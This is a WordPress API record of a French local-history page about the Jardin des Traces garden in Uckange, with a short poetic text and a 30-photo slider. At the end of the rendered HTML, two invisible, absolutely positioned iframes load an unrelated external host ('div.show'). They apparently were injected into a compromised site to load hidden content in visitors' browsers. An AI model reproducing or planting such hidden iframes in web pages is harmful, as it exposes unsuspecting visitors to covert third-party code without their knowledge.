{"id":7027,"date":"2023-07-04T16:35:41","date_gmt":"2023-07-04T14:35:41","guid":{"rendered":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7027"},"modified":"2023-07-04T16:55:35","modified_gmt":"2023-07-04T14:55:35","slug":"jardin-des-traces-a-uckange","status":"publish","type":"page","link":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7027","title":{"rendered":"Jardin des Traces \u00e0 Uckange"},"content":{"rendered":"<h2>Vendredi 2 juin 2023<\/h2>\n<p>M\u00e9tal hurlant, m\u00e9tal fondant, m\u00e9tal inspirant\u2026<\/p>\n<p>\u2026 Inspirant un jardin pour ne pas oublier et la Nature et le M\u00e9tal. Un jardin qui conduit du Pass\u00e9 vers le Futur, un futur que l\u2019humain voudrait \u00ab\u00a0propre\u00a0\u00bb. Mais voil\u00e0, c\u2019est plus compliqu\u00e9 qu\u2019il n\u2019y para\u00eet\u2026<\/p>\n<p>Et de traces, que laissera-t-il ? Peut-\u00eatre pas plus que celles du m\u00e9tal que le Temps d\u00e9chiquettera, que la Terre m\u00e2chouillera et avalera, en quelques secondes cosmiques\u2026<\/p>\n<div id=\"metaslider-id-7059\" style=\"width: 100%; margin: 0 auto;\" class=\"ml-slider-3-108-0 metaslider metaslider-responsive metaslider-7059 ml-slider has-dots-nav ms-theme-default\" role=\"region\" aria-label=\"Jardin des Traces\" data-height=\"600\" data-width=\"800\">\n    <div id=\"metaslider_container_7059\">\n        <ul id='metaslider_7059' class='rslides'>\n            <li aria-roledescription='slide' aria-labelledby='slide-0'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C001.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C001-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7060 msDefaultImage\" title=\"C001\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-1'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C002.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C002-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7061 msDefaultImage\" title=\"C002\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-2'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C003.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C003-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7062 msDefaultImage\" title=\"C003\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-3'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C004.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C004-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7063 msDefaultImage\" title=\"C004\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-4'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C005.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C005-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7064 msDefaultImage\" title=\"C005\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-5'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C006.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C006-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7065 msDefaultImage\" title=\"C006\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-6'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C007.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C007-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7066 msDefaultImage\" title=\"C007\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-7'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C008.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C008-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7067 msDefaultImage\" title=\"C008\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-8'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C009.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C009-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7068 msDefaultImage\" title=\"C009\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-9'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C010.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C010-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7069 msDefaultImage\" title=\"C010\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-10'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C011.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C011-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7070 msDefaultImage\" title=\"C011\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-11'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C012.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C012-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7071 msDefaultImage\" title=\"C012\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-12'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C013.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C013-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7072 msDefaultImage\" title=\"C013\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-13'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C014.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C014-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7073 msDefaultImage\" title=\"C014\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-14'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C015.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C015-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7074 msDefaultImage\" title=\"C015\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-15'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C016.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C016-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7075 msDefaultImage\" title=\"C016\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-16'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C017.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C017-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7076 msDefaultImage\" title=\"C017\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-17'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C018.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C018-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7077 msDefaultImage\" title=\"C018\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-18'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C019.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C019-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7078 msDefaultImage\" title=\"C019\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-19'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C020.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C020-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7079 msDefaultImage\" title=\"C020\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-20'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C021.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C021-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7080 msDefaultImage\" title=\"C021\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-21'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C022.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C022-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7081 msDefaultImage\" title=\"C022\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-22'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C023.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C023-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7082 msDefaultImage\" title=\"C023\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-23'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C024.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C024-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7083 msDefaultImage\" title=\"C024\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-24'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C025.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C025-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7084 msDefaultImage\" title=\"C025\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-25'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C026.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C026-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7085 msDefaultImage\" title=\"C026\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-26'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C027.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C027-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7086 msDefaultImage\" title=\"C027\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-27'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C028.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C028-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7087 msDefaultImage\" title=\"C028\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-28'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C029.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C029-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7088 msDefaultImage\" title=\"C029\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-29'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C030.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/C030-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-7059 slide-7089 msDefaultImage\" title=\"C030\" \/><\/a><\/li>\n        <\/ul>\n        \n    <\/div>\n<\/div>\n<p>Photos Roger Mariotte<\/p>\n<p><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=6688\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-378\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/retour.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Vendredi 2 juin 2023 M\u00e9tal hurlant, m\u00e9tal fondant, m\u00e9tal inspirant\u2026 \u2026 Inspirant un jardin pour ne pas oublier et la Nature et le M\u00e9tal. Un jardin qui conduit du Pass\u00e9 vers le Futur, un futur que l\u2019humain voudrait \u00ab\u00a0propre\u00a0\u00bb. Mais&hellip; <\/p>\n","protected":false},"author":1,"featured_media":0,"parent":6688,"menu_order":2,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_mc_calendar":[],"footnotes":""},"class_list":["post-7027","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/7027","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7027"}],"version-history":[{"count":4,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/7027\/revisions"}],"predecessor-version":[{"id":7094,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/7027\/revisions\/7094"}],"up":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/6688"}],"wp:attachment":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7027"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}